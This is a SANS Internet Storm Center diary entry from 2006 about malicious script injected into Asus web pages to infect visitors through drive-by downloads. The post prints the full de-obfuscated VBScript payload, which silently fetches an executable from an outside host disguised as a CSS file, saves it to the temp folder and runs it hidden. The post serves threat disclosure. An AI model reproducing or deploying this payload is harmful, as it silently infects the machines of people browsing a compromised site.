Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: InfoSec Handlers Diary Blog - Virus spreads from Asus Server InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Virus spreads from Asus Server

Published: 2006-12-16
Last Updated: 2006-12-16 20:10:54 UTC
by Koon Yaw Tan (Version: 1)
0 comment(s)
Robert has shared with us on a report that indicates drive-by-downloads injected in Asus pages:
http://www.heise-security.co.uk/news/82643

This is definitely not the first such cases. Websites that are not secure are favourite sources for attackers to use them as a platform to launch attack.

Our Handler, Lenny. has de-obfuscated version of the VBScript that triggered the download:

html
 <script language="VBScript">
   on error resume next
   clID1  = "clsi"
   clID2  = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
   XML1 = "Mic"
   XML2 = "rosoft.XMLHTTP"
   AdoSqa1 = "Adodb.S"
   AdoSqa2 = "tream"
   oGet   = "GET"
   fname1 = "AdCount.com"
   SFO    = "Scripting.FileSystemObject"
   SApp   = "Shell.Application"
   dl     = "http://www.yyc8.com/script/src/rss3.css"
   Set df = document.createElement("object")
   df.setAttribute "classid", clID1&clID2
   Set x  =  df.CreateObject(XML1&XML2,"")
   set S  =  df.createobject(AdoSqa1&AdoSqa2,"")
   S.type = 1
   x.Open oGet, dl, False
   x.Send
   set F   = df.createobject(SFO,"")
   set tmp = F.GetSpecialFolder(2)
   fname1  = F.BuildPath(tmp,fname1)
   S.open
   S.write x.responseBody
   S.savetofile fname1,2
   S.close
   set Q  = df.createobject(SApp,"")
   Q.ShellExecute fname1,"","","open",0
   </script>
   <head>
   <title>Internet Explorer</title>
   </head><body></body>
/html

Keywords:
0 comment(s)
Diary Archives